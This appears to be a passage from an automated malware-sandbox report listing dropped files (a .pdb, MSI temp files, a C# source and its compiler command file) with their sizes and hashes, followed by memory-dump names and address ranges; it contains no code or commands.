07b9efeed115a65f9079ada86c7781eb48f3316ea5c7f3fdfee50cd08f0b75f2bbd0f02bd32fd1056a0850f9fe94fe9622656326ad43b4f12797606860ecf138

Download Submit
C:\Users\Admin\AppData\Local\Temp\d9w9p_jz.pdb
Filesize
11KB

MD5
8c738b1fbeccbda3a10b2566c5f7fb38

SHA1
294180465e1c8b9e58689240c378c34cd8c381b3

SHA256
0c6de1492339ccab4d58760e70a427dc0f97dac4714fac05603351898b72bfcb

SHA512
f9ac5e3ffd41e66f6a9494264ff39bd765438b92ae3d5d22a58e12f099d1762649562f41aeff2559751ce8407a73e32a963c5c1862be5533d58404a7e8bea743

Download Submit
C:\Windows\Installer\MSIB1D6.tmp
Filesize
125KB

MD5
b0bcc622f1fff0eec99e487fa1a4ddd9

SHA1
49aa392454bd5869fa23794196aedc38e8eea6f5

SHA256
b32687eaaad888410718875dcbff9f6a552e29c4d76af33e06e59859e1054081

SHA512
1572c1d07df2e9262d05a915d69ec4ebeb92eab50b89ce27dd290fb5a8e1de2c97d9320a3bb006834c98b3f6afcd7d2c29f039d9ca9afaa09c714406dedbc3c7

Download Submit
C:\Windows\Installer\MSIB1D6.tmp
Filesize
125KB

MD5
b0bcc622f1fff0eec99e487fa1a4ddd9

SHA1
49aa392454bd5869fa23794196aedc38e8eea6f5

SHA256
b32687eaaad888410718875dcbff9f6a552e29c4d76af33e06e59859e1054081

SHA512
1572c1d07df2e9262d05a915d69ec4ebeb92eab50b89ce27dd290fb5a8e1de2c97d9320a3bb006834c98b3f6afcd7d2c29f039d9ca9afaa09c714406dedbc3c7

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSCB4FD.tmp
Filesize
652B

MD5
a6a9bc5c90629873f6650f8135035a37

SHA1
5c64043a41b3e0bd3bde02c49aa55d99a79fd4ea

SHA256
6eddfef4f7bba1244f6aa230b6a21488f2aa7a49c7000640f6169abd23f78879

SHA512
3026a9d77a9b1b7b8f67d76181a76c70f7b846c8cf07006a3df5e1f4aa8ddfd45e04720089cad0cdde582ce4294de152b8511e11882287df0cfd4e745b1b0502

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\d9w9p_jz.0.cs
Filesize
447B

MD5
1640a04633fee0dfdc7e22c4f4063bf6

SHA1
3cb525c47b5dd37f8ee45b034c9452265fba5476

SHA256
55e16d2ca3e65ce6c62cd5be2af5d7264445c5d7e1b5f3be7149acfb47ae42a0

SHA512
85c5103dda738d6003d39b0b619e68942965ddb9d6e08e544abf377224fdb29c6cd1501a549e99e57875954cea44b5bdefd7cace018c8123e7bfb717ae0e973d

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\d9w9p_jz.cmdline
Filesize
309B

MD5
136d4b826485d0535b756cb2621df964

SHA1
4d3a9ada2f21d1ab98faf3df0b67ce3f774f4662

SHA256
1b47e8cee28c96feedf851d1098b9ace0c2947245ef9ee5c5176ed1860281d59

SHA512
9bdedaaf119938691ef0b2e05a1f05f255f36c3bf8fbf6688e3ce1642af9ddba494b1f21b4ee7cb205aaa98b2d32786c86d9f250763721fc5678bd9dc496fdef

Download Submit
memory/328-146-0x0000000000000000-mapping.dmp

Download
memory/756-159-0x0000000000000000-mapping.dmp

Download
memory/1492-140-0x0000000000000000-mapping.dmp

Download
memory/1508-178-0x0000000000000000-mapping.dmp

Download
memory/1864-147-0x0000000000000000-mapping.dmp

Download
memory/1892-183-0x0000000000000000-mapping.dmp

Download
memory/2228-170-0x0000000000000000-mapping.dmp

Download
memory/2288-161-0x0000000000000000-mapping.dmp

Download
memory/2296-132-0x0000000000000000-mapping.dmp

Download
memory/2372-154-0x0000020987740000-0x0000020987780000-memory.dmp

Filesize
256KB

Download
memory/2372-153-0x00000209875C0000-0x00000209875E0000-memory.dmp

Filesize
128KB

Download
memory/2372-150-0x0000000000000000-mapping.dmp

Download
memory/2664-149-0x0000000000000000-mapping.dmp

Download
memory/2856-155-0x0000000000000000-mapping.dmp

Download
memory/3120-167-0x0000000000000000-mapping.dmp

Download
memory/3136-156-0x0000000000000000-mapping.dmp

Download
memory/3384-131-0x00007FF822220000-0x00007FF822D7D000-memory.dmp

Filesize
11.4MB

Download
memory/3384-130-0x00007FF822D80000-0x00007FF8237B6000-memory.dmp

Filesize
10.2MB

Download
memory/3424-157-0x0000000000000000-mapping.dmp

Download
memory/3500-144-0x0000000000000000-mapping.dmp

Download
memory/3504-148-0x0000000000000000-mapping.dmp

Download
memory/3588-181-0x0000000000000000-mapping.dmp

Download
memory/3748-142-0x0000000000000000-mapping.dmp

Download
memory/3812-143-0x0000000000000000-mapping.dmp

Download
memory/4064-158-0x0000000000000000-mapping.dmp

Download
memory/4208-175-0x0000000000000000-mapping.dmp

Download
memory/4560-135-0x0000000000000000-mapping.dmp

Download
memory/4576-173-0x0000000000000000-mapping.dmp

Download
memory/4648-165-0x000001EB65DF0000-0x000001EB65E10000-memory.dmp

Filesize
128KB

Download
memory/4648-166-0x000001EB676B0000-0x000001EB676D0000-memory.dmp

Filesize
128KB

Download
memory/4800-141-0x0000000000000000-mapping.dmp

Download
memory/4912-145-0x0000000000000000-mapping.dmp

Download
memory/5092-160-0x0000000000000000-mapping.dmp

Download